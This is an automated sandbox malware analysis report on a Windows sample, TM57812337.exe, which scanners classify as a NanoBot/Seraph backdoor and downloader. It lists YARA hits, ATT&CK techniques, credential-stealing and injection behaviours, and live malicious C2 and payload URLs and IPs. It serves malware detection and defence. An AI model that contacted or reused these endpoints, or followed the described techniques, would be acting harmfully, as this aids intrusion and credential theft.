                Source: Yara matchFile source: 32.2.InstallUtil.exe.3faff34.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3fab0fe.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3faff34.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000020.00000000.473733509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.472431522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.488350765.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.472817757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.473252440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.476158261.0000000003F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.490307943.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.476008629.0000000003E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.475883360.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Qqsucntzxgqwkiqkvrafiufflip.exe PID: 6528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6288, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                11
                Registry Run Keys / Startup Folder
                1
                Extra Window Memory Injection
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Shared Modules
                Boot or Logon Initialization Scripts412
                Process Injection
                11
                Deobfuscate/Decode Files or Information
                111
                Input Capture
                114
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth1
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts1
                Exploitation for Client Execution
                Logon Script (Windows)11
                Registry Run Keys / Startup Folder
                3
                Obfuscated Files or Information
                1
                Credentials in Registry
                211
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration1
                Remote Access Software
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local Accounts2
                Command and Scripting Interpreter
                Logon Script (Mac)Logon Script (Mac)11
                Software Packing
                NTDS2
                Process Discovery
                Distributed Component Object Model111
                Input Capture
                Scheduled Transfer2
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Extra Window Memory Injection
                LSA Secrets131
                Virtualization/Sandbox Evasion
                SSH1
                Clipboard Data
                Data Transfer Size Limits12
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Masquerading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                Virtualization/Sandbox Evasion
                DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job412
                Process Injection
                Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                Hidden Files and Directories
                /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 635102 Sample: TM57812337.exe Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 78 Snort IDS alert for network traffic 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 Antivirus detection for URL or domain 2->82 84 11 other signatures 2->84 8 TM57812337.exe 16 8 2->8         started        13 Qjarsxlh.exe 14 4 2->13         started        15 Qjarsxlh.exe 2->15         started        17 2 other processes 2->17 process3 dnsIp4 76 3.124.188.36, 49718, 49753, 49761 AMAZON-02US United States 8->76 66 C:\Users\user\AppData\Local\...\Qjarsxlh.exe, PE32 8->66 dropped 68 C:\Users\...\Qqsucntzxgqwkiqkvrafiufflip.exe, PE32 8->68 dropped 70 C:\Users\...\Qjarsxlh.exe:Zone.Identifier, ASCII 8->70 dropped 72 C:\Users\user\AppData\...\TM57812337.exe.log, ASCII 8->72 dropped 106 Creates multiple autostart registry keys 8->106 108 Writes to foreign memory regions 8->108 110 Allocates memory in foreign processes 8->110 19 InstallUtil.exe 16 4 8->19         started        24 Qqsucntzxgqwkiqkvrafiufflip.exe 15 6 8->24         started        26 cmd.exe 1 8->26         started        112 Multi AV Scanner detection for dropped file 13->112 114 Machine Learning detection for dropped file 13->114 116 Injects a PE file into a foreign processes 13->116 28 InstallUtil.exe 13->28         started        30 cmd.exe 13->30         started        32 cmd.exe 15->32         started        118 Document exploit detected (process start blacklist hit) 17->118 120 Injects files into Windows application 17->120 34 conhost.exe 17->34         started        file5 signatures6 process7 dnsIp8 74 45.133.1.41, 49763, 49768, 80 DEDIPATH-LLCUS Netherlands 19->74 60 C:\Users\user\AppData\Roaming\...\excel.exe, PE32 19->60 dropped 86 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->86 88 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->88 90 Tries to steal Mail credentials (via file / registry access) 19->90 100 4 other signatures 19->100 62 C:\Users\user\AppData\Roaming\...\Qylfpmj.exe, PE32 24->62 dropped 92 Multi AV Scanner detection for dropped file 24->92 94 Machine Learning detection for dropped file 24->94 96 Creates multiple autostart registry keys 24->96 102 3 other signatures 24->102 36 InstallUtil.exe 24->36         started        40 cmd.exe 24->40         started        42 conhost.exe 26->42         started        44 timeout.exe 1 26->44         started        98 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->98 46 conhost.exe 30->46         started        48 timeout.exe 30->48         started        50 conhost.exe 32->50         started        52 timeout.exe 32->52         started        file9 signatures10 process11 file12 64 C:\Users\user\AppData\Roaming\...\run.dat, data 36->64 dropped 104 Hides that the sample has been downloaded from the Internet (zone.identifier) 36->104 54 conhost.exe 40->54         started        56 timeout.exe 40->56         started        58 conhost.exe 42->58         started        signatures13 process14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                TM57812337.exe40%VirustotalBrowse
                TM57812337.exe27%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
                TM57812337.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe69%ReversingLabsByteCode-MSIL.Downloader.Seraph
                C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe27%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
                C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exe69%ReversingLabsByteCode-MSIL.Downloader.Seraph
                C:\Users\user\AppData\Roaming\excel\excel.exe0%MetadefenderBrowse
                C:\Users\user\AppData\Roaming\excel\excel.exe0%ReversingLabs
                SourceDetectionScannerLabelLinkDownload
                33.0.InstallUtil.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                33.0.InstallUtil.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                14.2.InstallUtil.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                14.0.InstallUtil.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                33.0.InstallUtil.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                32.0.InstallUtil.exe.400000.3.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                32.0.InstallUtil.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                32.0.InstallUtil.exe.400000.2.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                32.0.InstallUtil.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                32.0.InstallUtil.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                33.0.InstallUtil.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                32.2.InstallUtil.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                33.2.InstallUtil.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                14.0.InstallUtil.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                14.0.InstallUtil.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                14.0.InstallUtil.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                33.0.InstallUtil.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                14.0.InstallUtil.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://gqbmwswBay.org0%Avira URL Cloudsafe
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://ctl133.1.41/jah/inc/9f3d37faadd0a5.php0%Avira URL Cloudsafe
                http://wwwrosoft.com/pkiops/crl/MicCod0%Avira URL Cloudsafe
                http://45.133.1.41100%Avira URL Cloudmalware
                https://api.ipify.org%appdata0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                http://45.133.1.41/jah/inc/9f3d37faadd0a5.php127.0.0.1POST100%Avira URL Cloudmalware
                http://45.133.1.41/jah/inc/9f3d37faadd0a5.php100%Avira URL Cloudmalware
                http://3.124.188.36/bay/loader/uploads/flip_Jozgxzue.jpg7Eiipbn.Properties.Resources0%Avira URL Cloudsafe
                http://3.124.188.360%Avira URL Cloudsafe
                http://45.133.1.41/jah/inc/9f3d37faadd0a5.phpS100%Avira URL Cloudmalware
                http://3.124.188.36/bay/loader/uploads/TM57812337_Nbfpwrzt.bmp0%Avira URL Cloudsafe
                http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                http://3.124.188.36/bay/loader/uploads/flip_Jozgxzue.jpg0%Avira URL Cloudsafe
                http://45.133.1.4140%Avira URL Cloudsafe
                http://YHHdpI.com0%Avira URL Cloudsafe
                http://www.microsoft.c0%URL Reputationsafe
                http://3.124.188.36/bay/loader/uploads/TM57812337_Nbfpwrzt.bmp5Khtha.Properties.Resources0%Avira URL Cloudsafe
                https://api.ipify.org%0%URL Reputationsafe
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://45.133.1.41/jah/inc/9f3d37faadd0a5.phptrue
                • Avira URL Cloud: malware
                unknown
                http://3.124.188.36/bay/loader/uploads/TM57812337_Nbfpwrzt.bmptrue
                • Avira URL Cloud: safe
                unknown
                http://3.124.188.36/bay/loader/uploads/flip_Jozgxzue.jpgtrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://gqbmwswBay.orgInstallUtil.exe, 0000000E.00000002.492466888.000000000329B000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://127.0.0.1:HTTP/1.1InstallUtil.exe, 0000000E.00000002.490929269.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://ctl133.1.41/jah/inc/9f3d37faadd0a5.phpInstallUtil.exe, 0000000E.00000003.462904984.00000000063E0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.485650023.00000000063E0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.487971745.00000000063E0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.495084891.00000000063E0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.450730842.00000000063E0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.462615950.00000000063E0000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://wwwrosoft.com/pkiops/crl/MicCodInstallUtil.exe, 00000021.00000002.535075239.0000000006380000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://45.133.1.41InstallUtil.exe, 0000000E.00000002.492252394.000000000324E000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://stackoverflow.com/q/14436606/23354Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                  high
                  https://github.com/mgravell/protobuf-netJTM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475823039.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489936529.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                    high
                    https://api.ipify.org%appdataInstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    low
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwInstallUtil.exe, 0000000E.00000002.490929269.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://github.com/mgravell/protobuf-netTM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475823039.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489936529.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                      high
                      http://45.133.1.41/jah/inc/9f3d37faadd0a5.php127.0.0.1POSTInstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://3.124.188.36/bay/loader/uploads/flip_Jozgxzue.jpg7Eiipbn.Properties.ResourcesQqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000000.336203472.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.474926628.0000000001145000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://3.124.188.36TM57812337.exe, 00000000.00000002.359956017.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475551325.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489449039.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507761742.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/mgravell/protobuf-netiTM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475823039.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489936529.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                        high
                        http://45.133.1.41/jah/inc/9f3d37faadd0a5.phpSInstallUtil.exe, 0000000E.00000003.450778091.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.490445917.0000000001499000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://stackoverflow.com/q/11564914/23354;TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475823039.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489936529.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                          high
                          https://stackoverflow.com/q/2152978/23354TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                            high
                            http://DynDns.comDynDNSnamejidpasswordPsi/PsiInstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://45.133.1.414InstallUtil.exe, 0000000E.00000002.492252394.000000000324E000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            low
                            http://YHHdpI.comInstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.microsoft.cInstallUtil.exe, 0000000E.00000003.429515499.00000000063B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.429433216.00000000063A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.450686331.00000000063B2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://3.124.188.36/bay/loader/uploads/TM57812337_Nbfpwrzt.bmp5Khtha.Properties.ResourcesTM57812337.exe, 00000000.00000002.359393635.0000000000112000.00000002.00000001.01000000.00000003.sdmp, Qjarsxlh.exe, 0000000F.00000002.482637947.0000000000E82000.00000002.00000001.01000000.00000009.sdmp, Qjarsxlh.exe, 00000010.00000002.506852615.00000000006D2000.00000002.00000001.01000000.00000009.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTM57812337.exe, 00000000.00000002.359956017.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475551325.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.492252394.000000000324E000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489449039.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507761742.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://api.ipify.org%InstallUtil.exe, 0000000E.00000002.490929269.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              low
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              3.124.188.36
                              unknownUnited States
                              16509AMAZON-02UStrue
                              45.133.1.41
                              unknownNetherlands
                              35913DEDIPATH-LLCUStrue
                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:635102
                              Start date and time: 27/05/202213:22:102022-05-27 13:22:10 +02:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 14m 9s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:TM57812337.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:37
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winEXE@39/12@0/2
                              EGA Information:
                              • Successful, ratio: 71.4%
                              HDC Information:
                              • Successful, ratio: 0.3% (good quality ratio 0.2%)
                              • Quality average: 75.2%
                              • Quality standard deviation: 27.7%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Adjust boot time
                              • Enable AMSI
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 80.67.82.211, 80.67.82.235
